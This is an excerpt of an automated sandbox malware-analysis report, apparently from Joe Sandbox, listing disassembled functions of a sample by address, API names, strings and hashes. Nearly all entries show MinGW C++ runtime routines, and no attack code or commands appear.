                              • Opcode ID: 6c6dc397bcfc3d7bd057b07cb20812d49aadedff8408ac0daff9085b880728a1
                              • Instruction ID: 7dedc2aeecf459837c65e4a5993c16327a05720e68a360734db217285e36eccb
                              • Opcode Fuzzy Hash: 6c6dc397bcfc3d7bd057b07cb20812d49aadedff8408ac0daff9085b880728a1
                              • Instruction Fuzzy Hash: B1A00224B19121BAB550FB5EB9419286370BB84F407550470E44C93211CA18B4019555
                              Function 00007FF733A92CA1 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6c6dc397bcfc3d7bd057b07cb20812d49aadedff8408ac0daff9085b880728a1
                              • Instruction ID: 2ce81a6f3dec8998a1eb81b340e2a46dc047bd7993a154cd45929d2169ae456c
                              • Opcode Fuzzy Hash: 6c6dc397bcfc3d7bd057b07cb20812d49aadedff8408ac0daff9085b880728a1
                              • Instruction Fuzzy Hash: 40A00224A49061BAB550BB5EB84182C6374BB44B407510474A44C92115C918B8409595
                              Function 00007FF733A92C95 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4a106e32c4a6080174302a149ac30b9e6130148b4833bdcd6d078f591f00d630
                              • Instruction ID: 51393c92f62639b4e6499e976d8fa5c3a880c3b4b3f9e815e1728d6647cbde7d
                              • Opcode Fuzzy Hash: 4a106e32c4a6080174302a149ac30b9e6130148b4833bdcd6d078f591f00d630
                              • Instruction Fuzzy Hash: 5DA00224A09031BAF550BB5EB94182C6370BB84B407550070A44C93215CA1CB8049595
                              Function 00007FF733A92C89 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b486b44e7f6395d6d6f326f56699bb4e0e100bdcf18c2a3a92430408b1c69c19
                              • Instruction ID: 24f4d2950d41ceb6383de3baacc827a25c0d4306864ee0694e176bbb8b41fbeb
                              • Opcode Fuzzy Hash: b486b44e7f6395d6d6f326f56699bb4e0e100bdcf18c2a3a92430408b1c69c19
                              • Instruction Fuzzy Hash: 29A00224A09021B6B550BF5EB84182C6370BB84B407510070A44CD2115D918B8009595
                              Function 00007FF733A92C71 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 58557bc93a265f3a0286e909add687be74777e79a4abc773061d4a945af235d2
                              • Instruction ID: 043be56bc5df0a5af39ba54c0cb2ec5d551cff7c33259a30ddff5bacf91d9268
                              • Opcode Fuzzy Hash: 58557bc93a265f3a0286e909add687be74777e79a4abc773061d4a945af235d2
                              • Instruction Fuzzy Hash: DAA00234A19031BAB550BB5EB8429286374BB44B407510074A44CD2111C918B4409559
                              Function 00007FF733AB00B0 Relevance: 68.4, APIs: 19, Strings: 20, Instructions: 184fileCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __acrt_iob_func$fwrite$fputs$abortfreememcpy$fputcstrlen
                              • String ID: what(): $ for for$%s: __pos (which is %zu) > this->size() (which is %zu)$/): $/): $bmit ful$gcc.gnu.$gh space$https://$l bug re$lease su$mat expa$not enou$nsion (P$org/bugs$org/bugs$port at $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
                              • API String ID: 4281356205-402461891
                              • Opcode ID: eb997c0df74a77824ee210dc3e530a7d72cf803758b5202cb6466e7bcaa452cf
                              • Instruction ID: 2d7fe6cf790f9c5bffd847da57988421419c8c25d19d7b9b27fabd12de6b151e
                              • Opcode Fuzzy Hash: eb997c0df74a77824ee210dc3e530a7d72cf803758b5202cb6466e7bcaa452cf
                              • Instruction Fuzzy Hash: CD712521A0874195FBB0EBA1A8447AEA7A5FB44BC4F800139FE9C27BD6DF3CD1009721
                              Function 00007FF733A9DA90 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 127COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ExceptionRaiseUnwindabort
                              • String ID: CCG $CCG!$CCG!$CCG"
                              • API String ID: 4140830120-3707373406
                              • Opcode ID: 9ad5889f15857e2d04d96f57575a4a2dedfa058689f059f98651bad18de2bcb2
                              • Instruction ID: dfebe960de96dc94f9a1b437701246a50e5a0b32149fc0105ac71f72bafca116
                              • Opcode Fuzzy Hash: 9ad5889f15857e2d04d96f57575a4a2dedfa058689f059f98651bad18de2bcb2
                              • Instruction Fuzzy Hash: 1251BF72A08B8492E7B09B15E844BA9B370FB89B94F904236EE8D23758CF38D5C1D700
                              Function 00007FF733AA8BD0 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 48threadCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CurrentDebugOutputStringThread_ultoaabort
                              • String ID: Error cl$eaning u$eys for $p spin_k$thread
                              • API String ID: 4191895893-3545615192
                              • Opcode ID: 268d67bc830eb8f4d829b214d415d97a6c76d3cbec68c4ddb8051817ff4d0b0f
                              • Instruction ID: 546416e52ea6c704cdc45c04eb2b447cf031624be41abf9ace9d83e1a24e8ac3
                              • Opcode Fuzzy Hash: 268d67bc830eb8f4d829b214d415d97a6c76d3cbec68c4ddb8051817ff4d0b0f
                              • Instruction Fuzzy Hash: 12217C3250DB8092F7B09B18F05832AFAE4FB85745F600234E2CD5ABA8CF7DD4488B51
                              Function 00007FF733AAA5B0 Relevance: 15.1, APIs: 10, Instructions: 133threadinjectionsynchronizationCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Thread$Event$Context$AllocHandleInformationObjectResumeSingleSuspendValueWait
                              • String ID:
                              • API String ID: 1746956495-0
                              • Opcode ID: 6f82ea897cc254fdc8d1df48c6c36e380fa4e2735a8ca9fdb96bba7dafe5cdcd
                              • Instruction ID: c8a7cd2f2874919de5d6078b7777b492ce3ba11e675e1f48fd6c4bf2110a0c70
                              • Opcode Fuzzy Hash: 6f82ea897cc254fdc8d1df48c6c36e380fa4e2735a8ca9fdb96bba7dafe5cdcd
                              • Instruction Fuzzy Hash: AB510B23E0958296FBF4BF348400678A7E0EF80B65F844234ED6D662D5DF2CE404A7A0
                              Function 00007FF733B19D40 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 385COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: basic_filebuf::underflow codecvt::max_length() is not valid$basic_filebuf::underflow error reading the file$basic_filebuf::underflow incomplete character in file$basic_filebuf::underflow invalid byte sequence in file
                              • API String ID: 0-2144588626
                              • Opcode ID: b5c1d70120b214b1fe0ed6eeb6b00fa85351658555a54fd348da6d2add6fe125
                              • Instruction ID: cd27f44c8c0d9ebd657a1eb52e7bf53f5d2a35b21baf14d6d7364c45c04c2af6
                              • Opcode Fuzzy Hash: b5c1d70120b214b1fe0ed6eeb6b00fa85351658555a54fd348da6d2add6fe125
                              • Instruction Fuzzy Hash: 2DF1D522E09B85D4EBA0AF35C5403B9A362FB55F98F884231DE8D27394DF38E594D361
                              Function 00007FF733B177E0 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 358COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: basic_filebuf::underflow codecvt::max_length() is not valid$basic_filebuf::underflow error reading the file$basic_filebuf::underflow incomplete character in file$basic_filebuf::underflow invalid byte sequence in file
                              • API String ID: 0-2144588626
                              • Opcode ID: bb31f356d9299864d01d0108ee76e836b80adf7f7ccde9c8c78e42e9199cdb15
                              • Instruction ID: d324628e969f76449b830458f19cd24f5dcb904b0cfe887405eef9300f6cfc62
                              • Opcode Fuzzy Hash: bb31f356d9299864d01d0108ee76e836b80adf7f7ccde9c8c78e42e9199cdb15
                              • Instruction Fuzzy Hash: E4E1E522E09B8595EBA0AF35C441379A361FF55F98F988231EE8D2B394DF38D484D361
                              Function 00007FF733A9CB40 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 138COMMON
                              Download Yara Rule
                              APIs
                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,00000000,00007FF733A9CD11,?,?,?,?,?,?,00007FF733B5FB68,00000000,?), ref: 00007FF733A9CB90
                              • VirtualQuery.KERNEL32 ref: 00007FF733A9CC5B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: QueryVirtual__acrt_iob_func
                              • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                              • API String ID: 4109086920-1534286854
                              • Opcode ID: dae522d676cdced85a5e90f8f5bcea37f33ebf9ca71ab51b7304e39f3d4fea4f
                              • Instruction ID: 831d8197557620fe31b44f181b501f46025c2adff8f86c9d780d5cb4226a2395
                              • Opcode Fuzzy Hash: dae522d676cdced85a5e90f8f5bcea37f33ebf9ca71ab51b7304e39f3d4fea4f
                              • Instruction Fuzzy Hash: 2351E572A08A46A1EA60AB14E840BA9FB60FF89BD4FC44135EE4D37394DF3CE446D750
                              Function 00007FF733B0A210 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 174COMMON
                              Download Yara Rule
                              APIs
                              • memset.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF733B0A255
                              • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF733B0A436
                                • Part of subcall function 00007FF733B0AEB0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000,?,?,?,00007FF733B09A42,?,?,?,?,?,?,?,00007FF733B09528), ref: 00007FF733B0AF2B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memcpy$memset
                              • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_replace_aux$basic_string::insert
                              • API String ID: 438689982-1339558951
                              • Opcode ID: eb37989ba01e0048d451ba794727691c6012a1fdb26c43e47d66a229c27df161
                              • Instruction ID: 4f94f7741f08fba7745e2da7728c597330320326ed7dcd7b0a0e5cb1d6f9f5c5
                              • Opcode Fuzzy Hash: eb37989ba01e0048d451ba794727691c6012a1fdb26c43e47d66a229c27df161
                              • Instruction Fuzzy Hash: F7510766B09695A0F9B1BA6694048BC93105F41FD0FC84932DE9C3B7D1DE2CE586A323
                              Function 00007FF733A9DFE0 Relevance: 13.7, APIs: 9, Instructions: 153COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: abort
                              • String ID:
                              • API String ID: 4206212132-0
                              • Opcode ID: 043f5c39b760065a03c19cdd6b0ec4422ce458bf6ef0d4ddb1d73fd42c48e8ec
                              • Instruction ID: 93b648b58d8cdafdd523452d1ebf38f830f24f124608c208531d1158624d9a5f
                              • Opcode Fuzzy Hash: 043f5c39b760065a03c19cdd6b0ec4422ce458bf6ef0d4ddb1d73fd42c48e8ec
                              • Instruction Fuzzy Hash: 6A517622B09606B4FEB5BB15D840DB8A350EF44B80FD88439E90D377A2DE3CE545E320
                              Function 00007FF733AA75D0 Relevance: 13.6, APIs: 9, Instructions: 121COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CriticalSection$Delete$CloseEnterHandleLeave$free
                              • String ID:
                              • API String ID: 3899327206-0
                              • Opcode ID: 298354f6bb1e566c7ec48f2f239ad294f8db25058ef562ccf30499f7e26387a2
                              • Instruction ID: 0b5a852e86b44ca21b4e29d180be11d531dce725ab54c14c3023f4928cea739d
                              • Opcode Fuzzy Hash: 298354f6bb1e566c7ec48f2f239ad294f8db25058ef562ccf30499f7e26387a2
                              • Instruction Fuzzy Hash: 0241A723B0450555E7A1AF65EC007AA9255AF81BBAFCC0232ED7D573D1DE3CD882D360
                              Function 00007FF733AA7190 Relevance: 13.6, APIs: 9, Instructions: 81COMMON
                              Download Yara Rule
                              APIs
                              • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,00007FF733AABB70,?,?,?,00007FF733AABC18,?,?,?,?,00007FF733AABCA5), ref: 00007FF733AA71BB
                              • CreateSemaphoreA.KERNEL32 ref: 00007FF733AA71EE
                              • CreateSemaphoreA.KERNEL32 ref: 00007FF733AA7204
                              • InitializeCriticalSection.KERNEL32(?,00007FF733AABB70,?,?,?,00007FF733AABC18,?,?,?,?,00007FF733AABCA5,?,?,?,00007FF733AAC1E4), ref: 00007FF733AA722C
                              • InitializeCriticalSection.KERNEL32(?,00007FF733AABB70,?,?,?,00007FF733AABC18,?,?,?,?,00007FF733AABCA5,?,?,?,00007FF733AAC1E4), ref: 00007FF733AA7232
                              • InitializeCriticalSection.KERNEL32(?,00007FF733AABB70,?,?,?,00007FF733AABC18,?,?,?,?,00007FF733AABCA5,?,?,?,00007FF733AAC1E4), ref: 00007FF733AA7238
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CriticalInitializeSection$CreateSemaphore$calloc
                              • String ID:
                              • API String ID: 2075313795-0
                              • Opcode ID: b031b1aa316c63ef7251444c0db798d59baad86ef942010984a892e79b93f944
                              • Instruction ID: 44ee8e3b8fea7ffe2b4f9753bd5af56962e5914c3f466cc67c1567a5d5a36d0e
                              • Opcode Fuzzy Hash: b031b1aa316c63ef7251444c0db798d59baad86ef942010984a892e79b93f944
                              • Instruction Fuzzy Hash: 79212733B0660155FBB9AFA5F900BB96290DF84B95F488135EE2C573D4EE3C94849360
                              Function 00007FF733B350C0 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 306stringCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
